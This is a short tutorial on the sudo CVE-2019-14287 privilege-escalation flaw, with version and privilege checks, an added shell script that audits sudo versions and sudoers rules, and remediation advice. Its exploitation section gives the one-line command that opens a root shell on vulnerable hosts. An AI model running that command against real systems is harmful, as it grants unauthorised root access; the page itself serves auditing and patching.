Sudo (CVE-2019-14287)
Explanation
CVE-2019-14287 affects Sudo versions prior to 1.8.28, allowing users with sudo privileges to gain root access on a vulnerable system, even if they’re restricted to running commands as non-root users.
How Does It Work?
Identification
To check if the system is affected, follow these steps:
Check the sudo version:
sudo --version
List sudo privileges:
sudo -l
Example output:
Matching Defaults entries for root on sudo-privesc:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User root may run the following commands on sudo-privesc:
    (ALL : ALL) ALL
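The two identification checks above can be scripted for auditing. The following is an added example, not part of the original page: it flags sudo versions older than 1.8.28 and sudoers rules whose Runas list allows ALL while excluding root. The function names, the `(ALL, !root)` rule form and the sample sudoers lines are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original page); sample data below is constructed.

# Succeeds when the given sudo version is older than 1.8.28.
sudo_version_affected() {
    # Keep the numeric x.y.z part and drop suffixes such as "p2".
    set -- $(printf '%s\n' "$1" | sed 's/[^0-9.].*$//' | tr '.' ' ')
    major=${1:-0} minor=${2:-0} patch=${3:-0}
    [ "$major" -lt 1 ] && return 0
    [ "$major" -gt 1 ] && return 1
    [ "$minor" -lt 8 ] && return 0
    [ "$minor" -gt 8 ] && return 1
    [ "$patch" -lt 28 ]
}

# Prints sudoers rules whose Runas user list grants ALL but negates root,
# i.e. users "restricted to running commands as non-root users".
risky_runas_rules() {
    awk '
        /^[ \t]*#([^0-9]|$)/ { next }        # comment or #include, not a "#uid" user
        match($0, /\([^):]*/) {              # "(" up to ":" or ")" = Runas users
            list = substr($0, RSTART + 1, RLENGTH - 1)
            if (list ~ /(^|[ ,])ALL([ ,]|$)/ && list ~ /![ ]*(root|#0)([ ,]|$)/)
                print
        }' "$1"
}

# Verdict for one host: exposed (old sudo + risky rule), outdated, or patched.
audit() {
    if ! sudo_version_affected "$1"; then echo patched; return; fi
    if [ -n "$(risky_runas_rules "$2")" ]; then echo exposed; else echo outdated; fi
}

# Constructed sudoers sample; on a real host pass /etc/sudoers and the version
# from: sudo --version | sed -n '1s/^Sudo version //p'
sample=$(mktemp)
trap 'rm -f "$sample"' EXIT
cat > "$sample" <<'EOF'
Defaults env_reset
# dave ALL=(ALL, !root) ALL
carol ALL=(ALL : ALL) ALL
bob   ALL=(www-data) /usr/bin/systemctl
alice ALL=(ALL, !root) /usr/bin/vi
EOF

echo "1.8.27:   $(audit 1.8.27 "$sample")"
echo "1.8.21p2: $(audit 1.8.21p2 "$sample")"
echo "1.8.28:   $(audit 1.8.28 "$sample")"
```

A verdict of `outdated` still calls for the update listed under Remediation; `exposed` means a matching rule should also be reviewed.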
Exploitation
To exploit this vulnerability, use the following command to run a shell as root:
sudo -u#-1 /bin/bash
Remediation
To prevent this vulnerability:
Restrict sudo permissions to only essential commands and users.
Update sudo to version 1.8.28 or later.